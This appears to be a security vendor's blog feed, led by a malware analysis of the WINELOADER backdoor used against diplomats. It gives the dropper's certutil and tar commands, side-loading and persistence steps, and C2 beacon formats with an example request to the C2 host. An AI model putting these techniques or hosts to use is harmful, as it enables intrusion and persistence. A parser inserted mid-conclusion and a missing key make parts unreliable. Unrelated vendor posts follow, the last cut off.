- Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats.
- New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server.
- Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions.
- Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain.
Attack Chain
Figure 1 below illustrates the multi-stage attack chain at a high level.
Figure 1: Multi-stage attack chain of WINELOADER.
Technical Analysis
In this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.
PDF analysis
The PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India.
The invitation contains a link to a fake questionnaire, which kickstarts the infection chain. The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file, wine.hta. Figure 2 below shows the contents of the PDF file.
Figure 2: The PDF invitation showcasing the malicious link.

A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and that the time of creation was January 29th, 2024, at 10:38 AM UTC.

HTA file analysis
The HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activity. The obfuscation technique used in the code exhibits patterns that match those of the publicly available obfuscator obfuscator.io. Figure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise the malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.
Figure 3: Obfuscated JavaScript code inside the HTA file.

The HTA file performs the following key functions:
1. Downloads a Base64-encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php
2. Saves the text file to the path: C:\Windows\Tasks\text.txt
3. Uses certutil.exe to Base64-decode the text file and write the result to a ZIP archive at the path C:\Windows\Tasks\text.zip. The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\\Tasks\text.zip
4. Extracts the contents of the ZIP archive to the path C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\text.zip -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft, and vcruntime140.dll is the malicious DLL crafted by the attacker, which is side-loaded automatically when sqlwriter.exe is executed. To the best of our knowledge, sqlwriter.exe has never before been abused in the wild by any threat actor for DLL side-loading. This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.
5. Executes sqlwriter.exe from the path C:\Windows\Tasks\, which kick-starts the infection chain.

WINELOADER binary analysis
When sqlwriter.exe executes, it loads a malicious DLL named vcruntime140.dll from the same directory via DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.
Figure 4: Code section that decrypts and executes the WINELOADER core module.

Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.
Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.

WINELOADER employs the following techniques to evade detection:
- Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:
  - The core module and subsequent modules downloaded from the C2 server
  - Strings (e.g., DLL filenames and API import function names)
  - Data sent to and received from the C2 server
- Some strings are decrypted on use and re-encrypted shortly after.
- Memory buffers for storing results from API calls or decrypted strings are zeroed after use.
- DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory.
The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).
Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.

WINELOADER is not injected into the following DLLs, as they contain exported functions used by the malware:
- advapi32.dll
- api-ms-win-crt-math-l1-1-0.dll
- api-ms-win-crt-stdio-l1-1-0.dll
- bcryptprimitives.dll
- iphlpapi.dll
- kernel32.dll
- kernelbase.dll
- mscoree.dll
- ntdll.dll
- ole32.dll
- rpcrt4.dll
- shlwapi.dll
- user32.dll
- wininet.dll

WINELOADER will inject itself into another randomly selected DLL, again via DLL hollowing, before it sends the first beacon request to the C2 server.

The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself.

The body of the HTTP GET request is encrypted with the same 256-byte RC4 key, and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected.
This information is available in the table below.

Offset | Length | Name | Description
0x0 | 2 | Length of padding bytes (n) | This value is randomized (min: 255, max: 65535), stored in little-endian (LE).
0x2 | n | Padding bytes | Padding bytes are randomly generated with the ProcessPrng API.
0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample.
0xa + n | 8 | Session ID? | Randomly generated on execution.
0x12 + n | 8 | Local IP address | The local IP address of the infected machine.
0x20 + n | 512 | Parent process name | In Unicode
0x220 + n | 512 | User name | In Unicode
0x420 + n | 30 | Machine name | In Unicode
0x43e + n | 4 | Parent process ID | In little-endian
0x442 + n | 1 | Parent process token elevation type | Information about the privileges of the token linked to the parent process.
0x443 + n | 8 | Polling interval for C2 requests | C0 D4 01 00 00 00 00 00 in the analyzed sample, which translates to 120,000 ms, or 2 minutes between requests.
0x44b + n | 1 | Request type? | 1 for beacon, 2 for status update
0x44c + n | 8 | Length of message | In little-endian. 0 for beacon requests
0x454 + n | 8 | Unknown? | Observed to match the value of the request type field.
0x45c + n | 8 | Module ID? | 00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.
0x464 + n | Varies | Message | Only observed for type 2 requests.
Table 1: WINELOADER C2 beacon request fields

An example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.

GET /api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1
Host: castechtools.com
Content-Length: 54674

54,674 bytes of binary data in the request body (not shown here)

The same RC4 key is then used to decrypt the response from the C2 server.
The fields for the decrypted response are shown in the table below.

Offset | Length | Name | Description
0x0 | 2 | Length of padding bytes (n) | This value is stored in little-endian (LE).
0x2 | n | Padding bytes | Unused bytes
0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample
0xa + n | 1 | Command | Command from C2
0xb + n | Varies | Command data | Binary data for command
Table 2: WINELOADER C2 response fields

The core module supports three commands:
- Execute modules from the C2, either synchronously or asynchronously (via CreateThread)
- Inject itself into another DLL
- Update the sleep interval between beacon requests

During our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily.

The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.

After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.

Command And Control Infrastructure
The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers. Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads.

Conclusion
The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe.
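The Table 1 and Table 2 layouts above can be turned into a parser that an analyst runs over a beacon body or C2 response recovered from a sandbox or memory capture. The following is an added example, not code from the ThreatLabz post: it assumes the buffer has already been RC4-decrypted (the key is not reproduced on this page), and every sample value apart from the campaign ID, module IDs and polling interval quoted in the tables is constructed here for illustration.

```python
import struct

# Table 1 layout: (name, X, length, codec); each field starts at X + n, where
# n is the padding length stored little-endian in the first two bytes.
BEACON_FIELDS = [
    ("campaign_id", 0x2, 8, "hex"),
    ("session_id", 0xa, 8, "hex"),
    ("local_ip", 0x12, 8, "hex"),
    # Table 1 gives no field for 0x1a..0x1f (local IP ends at 0x1a + n but the
    # parent process name starts at 0x20 + n), so those 6 bytes are skipped.
    ("parent_process_name", 0x20, 512, "utf16"),
    ("user_name", 0x220, 512, "utf16"),
    ("machine_name", 0x420, 30, "utf16"),
    ("parent_pid", 0x43e, 4, "u32"),
    ("token_elevation_type", 0x442, 1, "u8"),
    ("polling_interval_ms", 0x443, 8, "u64"),
    ("request_type", 0x44b, 1, "u8"),
    ("message_length", 0x44c, 8, "u64"),
    ("unknown", 0x454, 8, "u64"),
    ("module_id", 0x45c, 8, "hex"),
]
MESSAGE_OFFSET = 0x464            # message starts at 0x464 + n (type 2 only)
PADDING_MIN, PADDING_MAX = 255, 65535  # randomized range stated in Table 1

# Module IDs quoted in Table 1; the core module is printed there as zero bytes.
KNOWN_MODULE_IDS = {
    "0000000000000000": "core module",
    "6b19a8d2692e8564": "persistence module",
}


def _decode(raw: bytes, codec: str):
    if codec == "hex":
        return raw.hex()
    if codec == "utf16":  # "In Unicode": UTF-16LE, NUL-padded to the fixed size
        return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    if codec == "u8":
        return raw[0]
    if codec == "u32":
        return struct.unpack("<I", raw)[0]
    if codec == "u64":
        return struct.unpack("<Q", raw)[0]
    raise ValueError(f"unknown codec {codec}")


def parse_beacon(buf: bytes) -> dict:
    """Parse a decrypted beacon/status body into a dict keyed by Table 1 names."""
    if len(buf) < 2:
        raise ValueError("buffer too short to hold the padding length")
    n = struct.unpack_from("<H", buf, 0)[0]
    if not PADDING_MIN <= n <= PADDING_MAX:
        raise ValueError(f"padding length {n} outside the documented range")
    if len(buf) < MESSAGE_OFFSET + n:
        raise ValueError("buffer truncated before the fixed fields end")
    out = {"padding_length": n}
    for name, x, length, codec in BEACON_FIELDS:
        out[name] = _decode(buf[x + n : x + n + length], codec)
    out["module"] = KNOWN_MODULE_IDS.get(out["module_id"], "unknown")
    msg_len = out["message_length"]
    if out["request_type"] == 1 and msg_len != 0:
        raise ValueError("type 1 (beacon) request should carry no message")
    out["message"] = buf[MESSAGE_OFFSET + n : MESSAGE_OFFSET + n + msg_len]
    if len(out["message"]) != msg_len:
        raise ValueError("message truncated")
    return out


def parse_response(buf: bytes) -> dict:
    """Parse a decrypted C2 response per Table 2."""
    n = struct.unpack_from("<H", buf, 0)[0]
    if len(buf) < 0xb + n:
        raise ValueError("response truncated")
    return {
        "padding_length": n,
        "campaign_id": buf[0x2 + n : 0xa + n].hex(),
        "command": buf[0xa + n],
        "command_data": buf[0xb + n :],
    }


def build_sample_beacon(n: int = 300, request_type: int = 1, message: bytes = b"") -> bytes:
    """Constructed sample body (not a real capture) laid out exactly per Table 1."""
    def utf16(s: str, size: int) -> bytes:
        return s.encode("utf-16-le").ljust(size, b"\x00")
    body = bytearray(MESSAGE_OFFSET + n)          # zero-filled fixed region
    struct.pack_into("<H", body, 0, n)
    body[2 : 2 + n] = bytes((i * 7) & 0xFF for i in range(n))   # stand-in padding
    body[0x2 + n : 0xa + n] = bytes.fromhex("5fd59793ed26cb5a")  # campaign ID from Table 1
    body[0xa + n : 0x12 + n] = bytes.fromhex("0011223344556677")  # made-up session ID
    body[0x12 + n : 0x1a + n] = bytes([10, 0, 0, 5, 0, 0, 0, 0])  # made-up local IP bytes
    body[0x20 + n : 0x220 + n] = utf16("sqlwriter.exe", 512)
    body[0x220 + n : 0x420 + n] = utf16("jdoe", 512)
    body[0x420 + n : 0x43e + n] = utf16("WS-01", 30)
    struct.pack_into("<I", body, 0x43e + n, 4242)
    body[0x442 + n] = 2
    struct.pack_into("<Q", body, 0x443 + n, 120000)  # C0 D4 01 00 ... = 120,000 ms
    body[0x44b + n] = request_type
    struct.pack_into("<Q", body, 0x44c + n, len(message))
    struct.pack_into("<Q", body, 0x454 + n, request_type)  # observed to mirror request type
    body[0x45c + n : 0x464 + n] = bytes.fromhex("6b19a8d2692e8564") if message else bytes(8)
    return bytes(body) + message


if __name__ == "__main__":
    for k, v in parse_beacon(build_sample_beacon()).items():
        print(f"{k:22} {v!r}")
```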
The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions. While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.

Zscaler Coverage
Figure 7: Zscaler sandbox detection report

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names:
- Win64.Downloader.WineLoader

Indicators Of Compromise (IOCs)
SHA256 hashes for the two PDF invitations, wine.hta, the vcruntime140.dll loader, and the WINELOADER core and persistence modules (decrypted and RC4-encrypted) are published in the original post.

URL | Description
hxxps://castechtools[.]com/api.php | WINELOADER C2
hxxps://seeceafcleaners[.]co[.]uk/cert.php | Downloads the base64-encoded ZIP archive from this URL.
hxxps://seeceafcleaners[.]co[.]uk/wine.php | Downloads the ZIP archive containing the wine.hta file.
hxxps://passatempobasico[.]com[.]br/wine.php | Downloads the ZIP archive containing the wine.hta file (IOC from July 2023).
MITRE ATT&CK Framework

ID | Tactic | Description
T1204.002 | User Execution: Malicious File | The PDF file that masquerades as an invitation contains a malicious link.
T1656 | Impersonation | The contents of the PDF are crafted to impersonate the Ambassador of India.
T1204.001 | User Execution: Malicious Link | The PDF file contains a link that leads to the download of a malicious ZIP archive.
T1574.002 | Hijack Execution Flow: DLL Side-Loading | sqlwriter.exe is used to DLL side-load vcruntime140.dll.
T1055.001 | Process Injection: Dynamic-link Library Injection | DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER into that DLL.
T1573.001 | Encrypted Channel: Symmetric Cryptography | The RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server.
T1041 | Exfiltration Over C2 Channel | Data is encrypted and exfiltrated to the C2 server.
T1584 | Compromise Infrastructure | Compromised sites are used for hosting payloads and as a C2 server.
T1053.005 | Scheduled Task/Job: Scheduled Task | A scheduled task with the name "MS SQL Writer" is created to ensure sqlwriter.exe is executed to kick-start the infection chain.
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder | WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
T1140 | Deobfuscate/Decode Files or Information | WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use.
T1036.001 | Masquerading: Invalid Code Signature | vcruntime140.dll has an invalid Microsoft code signing certificate.
T1036.004 | Masquerading: Masquerade Task or Service | The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task.
T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | API names are decrypted before they are dynamically resolved and called.
T1027.009 | Obfuscated Files or Information: Embedded Payloads | WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses.
T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe executes wine.hta, which contains malicious JS downloader code.
T1033 | System Owner/User Discovery | WINELOADER sends the current user and system name in each C2 request.
T1071.001 | Application Layer Protocol: Web Protocols | WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body, which is atypical of such requests.
T1001.001 | Data Obfuscation: Junk Data | WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2.

Appendix
Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server.

Tue, 27 Feb 2024 09:32:38 -0800 Sudeep Singh https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

Why Haven't Firewalls and VPNs Stopped More Organizations from Being Breached?
https://www.zscaler.com/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breached

Reducing cyber risk is an increasingly important initiative for organizations today. Because a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals' malicious ends. Specifically, the go-to tools deployed in an effort to enhance security are firewalls and VPNs. Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year.
News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One need not look far for concrete examples: the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven't firewalls and VPNs stopped more organizations from being breached?

The weaknesses of perimeter-based architectures
Firewalls and VPNs were designed for an era gone by: when users, apps, and data resided on premises, when remote work was the exception, and when the cloud had not yet materialized. In that age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more. In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists.

The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges.
These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and, of primary importance for our topic in this blog post, increased risk.

How do firewalls and VPNs increase risk?
There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference.

They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design, so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem worsens.

They enable compromise. Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations.

They allow lateral threat movement. Firewalls and VPNs are what primarily compose the "moat" in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the "castle," i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage.

They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist.

Why zero trust can stop organizations from being breached
Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can:
- Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections
- Stop compromise: Leverage a high-performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats
- Prevent lateral movement: Connect users, devices, and workloads directly to the apps they are authorized to access instead of connecting them to the network as a whole
- Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints

In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more. If you would like to learn more about zero trust, join our upcoming webinar, "Start Here: An Introduction to Zero Trust." Or, if you would like to dive deeper into the weaknesses of yesterday's tools, read our new ebook, "4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches."

Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa https://www.zscaler.com/blogs/product-insights/why-havent-firewalls-and-vpns-stopped-more-organizations-being-breached

AI-Powered Sales Leadership: Transforming the Playbook for World-Class Coaching
https://www.zscaler.com/blogs/company-news/ai-powered-sales-leadership-transforming-the-playbook-for-world-class-coaching

We are in an era of change brought about by AI. There's a lot of positivity but also uncertainty. For sales leaders, the advent of artificial intelligence (AI) presents an opportunity to rewrite the playbook for optimising our impact across our whole team. There's an opportunity to capitalise on the processing power of AI to amplify sales leaders' experience and talent.

Currently, I have the privilege of running our sales leadership enablement in EMEA at Zscaler, and advising external GTM leaders. I've also been doing some independent research into AI. As such, I have developed a good understanding of the current challenges sales teams face and how AI could assist us in being more effective leaders in the future.

Current State: Human-Powered Sales Forecasting
In sales, managing the forecast is one of the key challenges for leaders. Managing the forecast today can mean getting intimately involved in as many deals as possible so that you can spot risk, coach the people involved, and drive the right actions and urgency directly. This approach has, in the past, worked effectively at delivering the forecast, but with clear drawbacks: inconsistency, time drain, and inability to scale.
Sometimes referred to as the "hero" approach, "saving" deals can be exhausting for leaders and can unintentionally create a micro-management style of culture that leads to other challenges. In addition, a sales leader can only focus on a few key deals at a time, sometimes sacrificing support for the vast majority.

The Data Dilemma
Sales leaders are not data analysts. Currently, they are expected to review large amounts of performance data constructively, extract the necessary insights efficiently, and translate these insights into coaching opportunities for their salespeople.

Traditionally, we use leading indicators to help us understand what activities will deliver success for our salespeople and sales leaders. These are powerful metrics that shape the weekly and quarterly operating cadence for our teams. These leading indicators are manual inputs, e.g.:
- Number of new business meetings
- Number of opportunity progression meetings
- Proof of values
- Pipeline coverage, etc.

Leading indicators have always been very important because we need a scalable way of measuring how to protect the business now and in the future. However, what every good sales leader knows is that for each person, business unit, region, and market, there are always discrepancies based on the skill of the individual, their tenure, the market, the culture of the region, etc. Therefore, it becomes challenging to cater for these nuances at scale, and the manual inputs can feel limited. In an age when we can develop deeper insights, imagine if we could tailor-make leading indicators that are fit for each individual, team, or region.

The human-powered playbook for sales leaders stops working at scale
As the needs of our employees change and the metrics for success remain constant, there is an opportunity to evolve this traditional playbook, looking toward new tools for assistance. Specifically, AI can help us to scale our ability to coach our people, understand potential business risks, and deliver for the business.

Future State: AI-Assisted Analysis & Insights to Optimise Sales Coaching
The charter for sales leadership has always been about prioritising their people – putting them before the deal and providing the right tools to be successful. Now we have an opportunity to expand our coaching at scale using data to guide us to the right areas of focus. There is a huge opportunity for sales leaders to develop their management style and transition from being dealmakers to being transformative coaches, assisted by AI.

You may have heard of the term "Building a Second Brain," coined by Tiago Forte: "Building a Second Brain is a methodology for saving and systematically reminding us of the ideas, inspirations, insights, and connections we've gained through our experience … . A Second Brain ultimately expands our memory and our intellect using modern tools of technology."

AI presents the potential to serve as a second brain, helping bridge the gap between a sea of data and effective coaching conversations, ultimately helping leaders scale. For instance, imagine an AI tech stack that can help us ingest the sea of data across deals, learn the patterns and trends across the entire GTM salesforce, benchmark the performance data against the norm, trend this information and tailor it at scale for specific individuals, then create intuitive, human-like written insights that are easy for sales leaders to understand in the moment so that they can coach their team effectively on where to focus their time and energy.

AI could finally be the technology that helps sales leaders develop insights from the pool of performance data in real time so that they can deliver impactful coaching for their people. I'm privileged to be a part of this game-changing transformation. It's an exciting time for all sales leaders if we adapt and evolve the way we think and behave. This topic is top of mind for myself and the other sales leaders at Zscaler and across industries. I welcome you to join the conversation, perhaps by responding to this prompt: How can AI help us rewrite the Sales Leader playbook, and help us become world-class coaches?

If you're interested in learning more about the advancements we're driving and the opportunities for growth within Zscaler's sales organisation, please DM me directly to begin the conversation.

Thu, 22 Feb 2024 07:29:08 -0800 Jason Creane https://www.zscaler.com/blogs/company-news/ai-powered-sales-leadership-transforming-the-playbook-for-world-class-coaching

The old social engineering playbook – Now with AI!
https://www.zscaler.com/blogs/company-news/the-old-social-engineering-playbook-now-with-ai

When you've been in the security world long enough, you start to see old playbooks being reused with new technology. Case in point: "deepfake" has been an increasingly common phrase in the news, describing digitally manipulated video being used to misrepresent a person or falsify identity. The latest example of deepfake targeting, where a successful video call resulted in a 25 million USD money transfer, captured people's attention for a number of reasons. The main news value was in the enormous amount of money that the attackers were able to steal by faking a single video call. In itself, the technical playbook used to trick the person was nothing new. However, this deepfake example demonstrated once again just how high a level of sophistication is possible when AI is orchestrated creatively.

People generally fear a relatively new technology, like AI, because they can't immediately grasp its full potential and they have a fear of the unknown.
Similarly, technological advancements also scare people when they feel like they pose a threat to their sense of security or working lives, such as losing their jobs to AI. The social engineering techniques used by adversaries have continuously evolved, and usually these adversaries are faster to adopt new technologies for their benefit than we, the defenders, are to protect their victims. You can see examples of this in the not too distant past: In times of modem connectivity, a common piece of malware would dial up a modem in the middle of the night and connect it to a toll number, leading to enormous bills. A few years ago, a rash of malicious Android apps hacked mobile phones to dial toll numbers as a way to make quick and easy money – basically a modern form of the old modem dialer tactic. Cryptominers harvesting the compute power of infected systems were then the next step in this evolution.

The human risk factor
History has shown us a number of examples of the old social engineering playbook in use. The technique of faking a senior executive's voice by reusing publicly available audio clips to threaten users into taking action is already fairly well known. Faking video sessions showing a range of people in a live and interactive call, however, reaches a new (and scary) level of cybercriminal sophistication and has therefore sown a new level of appropriate and respectful fear around AI's technological evolution. It is the perfect demonstration of how easily humans can be tricked or coerced into taking action – and of bad actors using this to their advantage. But this attack also highlights how a new piece of technology can enable adversaries to do the same tasks they have been doing before, but more efficiently. And bad guys are taking advantage of this technological advancement fast.

Unfortunately, the general public is still not fully aware of how social engineering techniques continue to evolve. They don't follow security news and trust that these kinds of attacks will never happen to them. This is what makes traditional security awareness training difficult to prove effective: the public doesn't believe they (as individuals) will be targeted. So when it does happen, they are unprepared and are duped into falling prey to the social engineering attack.

In the wake of this recent attack, questions were also raised about how – if AI is really good enough to make these video scenarios look so realistic – an employee would have any chance of detecting the fake. The fact is that human beings are not machines, and they will always be a risk factor as an organisation's first line of defence because they will have a variable level of security awareness (no matter how good the internal training process might be). Imagine if someone has a bad night or returns home late from a business trip or sports event. They simply might not be as laser-focused on detecting modern social engineering techniques or paying attention to the details the following day. The big challenge is that AI won't have an off day – its targeting will remain consistent.

The technology to fight these playbooks already exists – but it is not widely used
The fact that these kinds of plays keep working shows that businesses have not yet adapted their security and organisational processes to handle them. One way to counteract deepfake videos starts at the (security) process level. My first idea is a simple one: to ensure that teleconferencing systems include a function to authenticate a logged-on user as a human being. A straightforward plug-in could do the job, employing two-factor authentication to verify an identity within Zoom or Teams, for example. Hopefully such an API would be fairly easy to develop and would be a huge step forward in preventing sniffing attacks via the phone as well.

Additionally, the mindset about being afraid of AI has to change. It is an amazing piece of technology, not only when it is misused. Society just needs to understand its boundaries. AI can actually be implemented to stop these sorts of modern attacks if security executives learn how to control the problem and use the technology to get ahead of the bad actors. Deception technologies already exist, and AI can be used to detect anomalies much faster and more effectively, showing its potential for good.

From a more all-up security perspective, adopting a Zero Trust mentality for security can enable organisations to continually improve their security posture on the process level. Zero Trust could not only help on a connectivity level, but it could also improve security workflows, which helps to verify whether everyone in a call is authenticated against an internal directory. Zscaler's Identity Threat Detection and Response (ITDR) is already mitigating threats that target a user's identity. With the help of the new service, the risk to identities is becoming quantifiable, misconfigurations are being detected, and real-time monitoring and privileged escalations are helping to prevent breaches.

Finally – going back to the initial example of the successful deepfake – it is hard to believe that you can transfer so much money in a modern organization without verification processes operating in the background. Organisations would be well advised to check the overall risk level of such processes within their own infrastructure. It would raise the barriers to an attack greatly if solid administrative processes were put in place to reduce risk – not only in the security organisation, but for operational processes like payments authentication as well. Not everything needs to be enhanced by a technological solution. Sometimes a new procedure where two people must sign off on a funds transfer could be the step which protects the organization from losing $25m USD.
Tue, 20 Feb 2024 05:54:06 -0800 James Tucker https://www.zscaler.com/blogs/company-news/the-old-social-engineering-playbook-now-with-ai

NIS 2.0 - New Cybersecurity Rules In the EU https://www.zscaler.com/blogs/company-news/nis-2-0-new-cybersecurity-rules-eu

Back in 2021, the White House issued an executive order compelling federal government agencies to develop a plan for implementing a zero trust architecture. This was followed by a memorandum that mandated federal agencies to achieve specific zero trust security goals by the end of 2024. Last year, as you may have heard, the SEC in the United States issued new rules compelling publicly traded companies to disclose material cybersecurity breaches. As it's happened, the SEC has wasted no time in showing its regulations have teeth, with the first prosecutions having already taken place.

So, there's a lot going on in the USA, but it's not the only place in the world where policymakers are pushing for—or even mandating—the adoption of zero trust principles. This year the European Union will be updating and tightening its Network and Information Systems (NIS) directive, and as anyone who experienced the arrival of the GDPR regulations on privacy will tell you, the reach of EU regulations can be great indeed.

NIS 2.0

The NIS 2.0 directive comes into force in October 2024, mandating that management bodies within organizations in specific categories implement cybersecurity risk management measures. Impacted categories extend to:

- Energy
- Transport
- Banking
- Financial market infrastructure
- Health
- Drinking water
- Wastewater
- Digital infrastructure
- ICT service management (B2B)
- Public administrations
- Space
- Postal and courier services
- Waste management
- Manufacture, production, and distribution of chemicals
- Food production, processing, and distribution
- Manufacturing
- Digital providers
- Research

As you can see, the directive is focused on critical physical and digital infrastructure within EU member states, but it also has reach. It applies not only to organizations within the EU, but also to any organization worldwide that provides services to any of the protected sectors within the EU. As with the SEC regulations, there are strict rules for prompt incident reporting.

The stick

The picture is abundantly clear at this point. Government bodies in regions covering hundreds of millions of citizens have recognized that the risk of inadequate cybersecurity practices is severe enough to warrant strict regulations and even severe penalties. The carrot has been in place for many years—now comes the stick!

The carrot

